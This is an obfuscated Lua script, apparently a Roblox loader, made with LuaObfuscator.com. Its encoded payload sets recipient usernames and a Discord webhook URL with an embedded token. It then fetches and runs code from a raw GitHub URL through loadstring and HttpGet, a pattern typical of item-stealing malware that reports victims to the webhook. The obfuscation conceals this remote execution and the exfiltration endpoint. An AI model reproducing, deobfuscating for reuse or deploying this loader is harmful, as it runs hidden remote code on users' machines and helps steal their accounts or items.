--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v74=0;local v75;while true do if (v74==0) then v75=v2(v0(v20,16));if v19 then local v102=v5(v75,v19);v19=nil;return v102;else return v75;end break;end end end end);local function v21(v22,v23,v24)if v24 then local v76=(v22/((2 -(0 -0))^(v23-(1592 -(889 + 702)))))%((1 + 1)^(((v24-(3 -2)) -(v23-(1 -0))) + 1 + 0)) ;return v76-(v76%(1262 -(781 + 480))) ;else local v77=0 -0 ;local v78;while true do if (v77==(0 -(1711 -(1502 + 209)))) then v78=(1 + 1)^(v23-((598 -(411 + 186)) + 0)) ;return (((v22%(v78 + v78))>=v78) and (425 -(36 + 388))) or (0 -0) ;end end end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39=1463 -((2753 -(1159 + 801)) + 670) ;local v40;local v41;while true do if (v39==(1 + 0)) then return (v41 * (767 -511)) + v40 ;end if (v39==(633 -(215 + 418))) then v40,v41=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;v39=1;end end end local function v27()local v42=1023 -(723 + 300) ;local v43;local v44;local v45;local v46;while true do if (v42==(0 -0)) then v43,v44,v45,v46=v1(v16,v18,v18 + 1 + 2 );v18=v18 + 4 ;v42=311 -(225 + 85) ;end if (v42==(1 + 0 + 0)) then return (v46 * (598102 + 1108760 + 15070354)) + (v45 * (64760 + 776)) + (v44 * (843 -587)) + v43 ;end end end local function v28()local v47=1078 -(717 + 361) ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(1 + (0 -0))) then v50=294 -((799 -(285 + 280)) + 59) ;v51=(v21(v49,118 -(22 + 95) ,68 -48 ) * (((64 + 608) -(76 + 594))^32)) + v48 ;v47=2 + 0 ;end if (v47==(2 + 0)) then v52=v21(v49,1160 -(1015 + 124) ,59 -28 );v53=((v21(v49,(27 + 38) -33 )==((2304 -956) -(665 + 682))) and  -(1888 -(1501 + 386))) or 1 ;v47=3 + 0 ;end if (v47==((490 -87) -(294 + (1697 -(1429 + 162))))) then if (v52==(0 -0)) then if (v51==(48 -((1038 -(987 + 16)) + 13))) then return v53 * (0 + 0) ;else local v103=0 + 0 ;while true do if ((0 + 0)==v103) then v52=1 + (0 -0) ;v50=0;break;end end end elseif (v52==2047) then return ((v51==(0 -(0 + 0))) and (v53 * ((3 -2)/(0 + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(2508 -1485) ) * (v50 + (v51/(((1748 -(88 + 1406)) -(158 + 94))^(21 + (122 -91))))) ;end if (v47==(0 + 0)) then v48=v27();v49=v27();v47=1 + 0 ;end end end local function v29(v30)local v54=(0 -0) -0 ;local v55;local v56;while true do if (v54==(1 + 1)) then v56={};for v79=3 -(6 -4) , #v55 do v56[v79]=v2(v1(v3(v55,v79,v79)));end v54=3;end if ((156 -(59 + 96))==v54) then v55=v3(v16,v18,(v18 + v30) -(1 + 0) );v18=v18 + v30 ;v54=9 -7 ;end if (v54==(1686 -(1239 + 444))) then return v6(v56);end if (v54==(1467 -(868 + 599))) then v55=nil;if  not v30 then v30=v27();if (v30==(0 -0)) then return "";end end v54=1;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v57=1635 -(196 + 1439) ;local v58;local v59;local v60;local v61;local v62;local v63;while true do local v67=0 -0 ;while true do if ((0 -0)==v67) then if (v57~=(6 -3)) then else local v91=0;while true do if (v91~=(1227 -(807 + 419))) then else return v61;end if ((0 -0)==v91) then for v108=1,v27() do v59[v108-1 ]=v33();end for v110=1 + 0 ,v27() do v60[v110]=v27();end v91=1 + 0 ;end end end if (v57~=(0 + 0)) then else local v92=0;while true do if (v92==(0 -0)) then v58={};v59={};v92=1;end if (v92~=1) then else v60={};v57=1;break;end end end v67=1 -0 ;end if (v67==1) then if (v57~=1) then else local v93=0;local v94;while true do if (v93==(0 -0)) then v94=952 -(525 + 427) ;while true do if (v94~=0) then else v61={v58,v59,nil,v60};v62=v27();v94=1 + 0 ;end if (v94~=1) then else v63={};v57=2 + 0 ;break;end end break;end end end if (v57==2) then local v95=0 -0 ;local v96;while true do if (0~=v95) then else v96=0;while true do if (v96~=(1855 -(1744 + 110))) then else for v115=1,v27() do local v116=0;local v117;local v118;local v119;while true do if (v116==(2 -1)) then v119=nil;while true do if (v117~=0) then else local v145=0 + 0 ;while true do if (v145==(0 -0)) then v118=0 + 0 ;v119=nil;v145=1;end if (v145==(1 + 0)) then v117=1;break;end end end if (v117~=1) then else while true do if (v118~=0) then else v119=v25();if (v21(v119,587 -(183 + 403) ,3 -2 )~=(0 -0)) then else local v157=0;local v158;local v159;local v160;local v161;local v162;while true do if (v157~=2) then else v162=nil;while true do if ((2 + 0)~=v158) then else while true do if (v159~=(1 -0)) then else local v174=0 -0 ;local v175;while true do if (v174~=(1554 -(726 + 828))) then else v175=0 + 0 ;while true do if (v175~=(2 -1)) then else v159=2 + 0 ;break;end if (v175~=(887 -(663 + 224))) then else local v185=1392 -(567 + 825) ;while true do if (v185==1) then v175=1 + 0 ;break;end if (v185~=0) then else v162={v26(),v26(),nil,nil};if (v160==(1744 -(236 + 1508))) then local v189=0;local v190;local v191;while true do if (v189==(0 + 0)) then v190=0 -0 ;v191=nil;v189=1 + 0 ;end if ((1 + 0)~=v189) then else while true do if (v190~=(0 + 0)) then else v191=0 + 0 ;while true do if (v191==0) then v162[3]=v26();v162[1 + 3 ]=v26();break;end end break;end end break;end end elseif (v160==1) then v162[1984 -(419 + 1562) ]=v27();elseif (v160==2) then v162[3]=v27() -((1 + 1)^16) ;elseif (v160~=(8 -5)) then else local v199=1621 -(539 + 1082) ;local v200;local v201;while true do if (v199~=1) then else while true do if (v200==(0 + 0)) then v201=0;while true do if (v201==0) then v162[9 -6 ]=v27() -((2 + 0)^16) ;v162[4]=v26();break;end end break;end end break;end if (v199~=0) then else v200=0;v201=nil;v199=1229 -(1151 + 77) ;end end end v185=3 -2 ;end end end end break;end end end if (v159==(245 -(234 + 9))) then local v176=0;local v177;while true do if (v176==0) then v177=0 -0 ;while true do if (v177==(0 + 0)) then local v186=1460 -(124 + 1336) ;while true do if (v186==1) then v177=1;break;end if (v186==(0 + 0)) then if (v21(v161,1278 -(929 + 348) ,1 + 0 )==(1 + 0)) then v162[5 -3 ]=v63[v162[2 + 0 ]];end if (v21(v161,2,2)~=(1 + 0)) then else v162[1 + 2 ]=v63[v162[4 -1 ]];end v186=1;end end end if (v177~=1) then else v159=1 + 2 ;break;end end break;end end end if (v159==3) then if (v21(v161,3,3 + 0 )==1) then v162[4]=v63[v162[4]];end v58[v115]=v162;break;end if (v159==0) then local v179=0;local v180;while true do if (0~=v179) then else v180=0;while true do if (v180~=0) then else local v187=0;local v188;while true do if (v187==(200 -(50 + 150))) then v188=0;while true do if (0==v188) then local v196=0;while true do if (v196~=0) then else v160=v21(v119,2,1 + 2 );v161=v21(v119,4 + 0 ,8 -2 );v196=1;end if ((1479 -(777 + 701))==v196) then v188=1;break;end end end if (v188~=1) then else v180=1;break;end end break;end end end if (v180==(1 + 0)) then v159=1;break;end end break;end end end end break;end if (v158==0) then local v171=0 -0 ;while true do if (v171==(1 + 0)) then v158=3 -2 ;break;end if (v171==0) then v159=1472 -(523 + 949) ;v160=nil;v171=274 -(191 + 82) ;end end end if (v158~=1) then else local v172=0 + 0 ;while true do if (v172==1) then v158=894 -(641 + 251) ;break;end if (v172==(0 + 0)) then v161=nil;v162=nil;v172=633 -(183 + 449) ;end end end end break;end if (v157~=1) then else v160=nil;v161=nil;v157=1547 -(765 + 780) ;end if (0==v157) then v158=0;v159=nil;v157=1;end end end break;end end break;end end break;end if (v116~=0) then else local v125=0;while true do if (v125~=1) then else v116=2 -1 ;break;end if (v125~=(46 -(15 + 31))) then else v117=0;v118=nil;v125=1;end end end end end v57=3;break;end if (v96==(599 -(590 + 9))) then for v120=2 -1 ,v62 do local v121=0;local v122;local v123;local v124;while true do if (v121==(393 -(109 + 283))) then v124=nil;while true do if ((1 + 0)~=v122) then else if (v123==1) then v124=v25()~=0 ;elseif (v123==2) then v124=v28();elseif (v123~=(1 + 2)) then else v124=v29();end v63[v120]=v124;break;end if (v122==(0 + 0)) then local v147=0 -0 ;local v148;while true do if ((276 -(18 + 258))==v147) then v148=0;while true do if (v148==(0 -0)) then v123=v25();v124=nil;v148=1;end if (v148==1) then v122=1;break;end end break;end end end end break;end if ((0 + 0)==v121) then local v126=0;local v127;while true do if (v126==0) then v127=0;while true do if (v127~=1) then else v121=1 + 0 ;break;end if (v127~=(0 -0)) then else v122=0;v123=nil;v127=1 + 0 ;end end break;end end end end end v61[3]=v25();v96=1;end end break;end end end break;end end end end local function v34(v35,v36,v37)local v64=v35[1];local v65=v35[2];local v66=v35[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (v68==1) then v71={...};v72=v12("#",...) -1 ;v68=2;end if (v68==0) then v69=1;v70= -1;v68=1;end if (v68==3) then A,B=v32(v11(v73));if  not A[1] then local v97=0;local v98;while true do if (v97==0) then v98=v35[4][v69] or "?" ;error("Script error at ["   .. v98   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end if (v68==2) then v73=nil;v73=function()local v81=v64;local v82=v65;local v83=v66;local v84=v32;local v85={};local v86={};local v87={};for v99=0 + (1514 -(698 + 816)) ,v72 do if (((4825 -(1531 + 445))>=(416 -256)) and (v99>=v83)) then v85[v99-v83 ]=v71[v99 + (1220 -(557 + 662)) ];else v87[v99]=v71[v99 + 1 + 0 ];end end local v88=(v72-v83) + (1 -0) ;local v89;local v90;while true do local v100=0 -0 ;local v101;while true do if (((2352 + 1749)>=(256 + (3238 -2325))) and (v100==(0 -0))) then v101=0 + 0 ;while true do if ((v101==0) or (((2002 -(323 + 447)) + 517)>=(1436 + 2121))) then v89=v81[v69];v90=v89[1 + 0 ];v101=790 -(311 + 478) ;end if ((((10596 + 8534) -(11911 + 3209))>(2281 -(513 + 1142))) and (v101==(1 -0))) then if ((220<=(84 + 470)) and (v90<=(2 + 1))) then if ((v90<=(1 + 0)) or ((1723 -(346 + 1066))>=3408)) then if ((((6037 -3672) -(483 + 471))<=(5324 -3253)) and (v90==((879 -(760 + 119)) -0))) then v87[v89[2 + 0 ]]=v37[v89[3]];else v37[v89[3]]=v87[v89[3 -1 ]];end elseif (((2405 -1114)<(6615 -4096)) and (v90==(1407 -(1093 + 312)))) then local v132=0;local v133;local v134;local v135;local v136;while true do if ((v132==2) or ((4150 -(1016 + 126))<2942)) then for v154=v133,v70 do local v155=0 + 0 ;local v156;while true do if (((0 -0)==v155) or (4760<=1851)) then v156=(119 -(118 + 1)) -0 ;while true do if (((1505 + 216)<=3958) and (v156==(0 -0))) then v136=v136 + 1 + 0 ;v87[v154]=v134[v136];break;end end break;end end end break;end if ((v132==(1 + 0)) or (((2301 + 238) -1501)>=(2472 -(392 + 620)))) then v70=(v135 + v133) -1 ;v136=0 -(0 + 0) ;v132=2;end if ((v132==(0 -0)) or ((1627 -(85 + 155))>(5046 -2085))) then local v151=0 + 0 + 0 ;while true do if ((v151==0) or (((935 -(108 + 83)) + 1936)==(9615 -5758))) then v133=v89[2 + 0 ];v134,v135=v84(v87[v133](v13(v87,v133 + (1910 -(1362 + 547)) ,v89[1350 -(147 + (2502 -(841 + 461))) ])));v151=1 + 0 ;end if ((((2834 -(442 + 171)) -(646 + 391))<=(5193 -(1584 + 288))) and (1==v151)) then v132=1 + 0 + (1650 -(237 + 1413)) ;break;end end end end else local v137=0 -0 ;local v138;local v139;local v140;local v141;while true do if (((8114 -4110)==(3835 + 169)) and (v137==(0 + 0))) then v138=0;v139=nil;v137=1 -0 ;end if ((v137==((7 -5) -(0 -0))) or ((3514 -(368 + 721))<=(1420 -(343 + 376)))) then while true do if ((((22458 -8350) -10469)>=(113 -76)) and (v138==1)) then v141=nil;while true do if ((v139==0) or (((16065 -(172 + 30)) -10941)<1556)) then local v165=0 + 0 ;while true do if (((4487 -(134 + 693))>(11038 -8046)) and ((1 + 0)==v165)) then v139=1701 -(1576 + 124) ;break;end if ((v165==(105 -(69 + 36))) or ((435 + 3890)==(4723 -(223 + (2073 -(48 + 1569)))))) then local v173=0 + 0 + 0 ;while true do if (((7372 -4705)>=(385 + 953)) and (v173==0)) then v140=v89[2];v141=v87[v89[14 -11 ]];v173=2 -1 ;end if ((v173==(1480 -(240 + 1239))) or (405>=(3587 -2209))) then v165=1 + 0 ;break;end end end end end if (((1915 -(358 + 405))<(1590 + 363)) and (v139==(3 -2))) then v87[v140 + 1 + 0 ]=v141;v87[v140]=v141[v89[4]];break;end end break;end if (((1903 -((425 -163) + 134))<(7673 -5242)) and (v138==(0 + 0))) then local v164=0 -0 ;while true do if ((v164==1) or ((158 + 302)>=(4337 -(273 + 317)))) then v138=1;break;end if ((((3012 -(771 + 1044)) + 2044)<4181) and (v164==0)) then v139=(1503 -(977 + 526)) + 0 ;v140=nil;v164=2 -1 ;end end end end break;end if ((v137==(1 + 0)) or (4405<=607)) then v140=nil;v141=nil;v137=2;end end end elseif (((4574 -(338 + 491))>(2713 -(157 + 1115))) and (v90<=(11 -6))) then if ((v90==(4 + 0)) or ((1540 + 56)<(233 + 1))) then do return;end else v87[v89[(835 -(620 + 214)) + 1 ]]=v89[7 -4 ]~=0 ;end elseif ((v90<=(4 + 2)) or ((632 + 3972)<=1613)) then local v143=0 -(0 + 0) ;local v144;while true do if ((((11033 -(946 + 545)) -(7487 -(485 + 1017)))<(16382 -11631)) and (v143==(0 -0))) then v144=v89[2];v87[v144]=v87[v144](v13(v87,v144 + 1 ,v70));break;end end elseif ((v90>(1006 -(371 + 628))) or ((990 -(437 + 258))>(1394 -(2435 -1423)))) then v87[v89[962 -(473 + 487) ]]();else v87[v89[2 + 0 ]]=v89[(2 + 4) -3 ];end v69=v69 + (749 -(668 + 80)) ;break;end end break;end end end end;v68=3;end end end;end return v34(v33(),{},v17)(...);end v15("LOL!0A3O0003083O00557365724E616D6503083O006561737962652O7203093O00557365724E616D653203093O00313533612O3334303703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039303732333235363033313533313034382F67545F6A717653505649335559526F47314E75486C4B5977587162695465496B75683159776B4D705962366F456B4D7548776E55684D51616C444248392D535058473076030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E000F3O0012073O00023O0012013O00013O0012073O00043O0012013O00033O0012073O00063O0012013O00053O00124O00073O00122O000100083O0020030001000100090012070003000A4O0005000400014O0002000100044O00065O00022O00083O000100012O00043O00017O000F3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
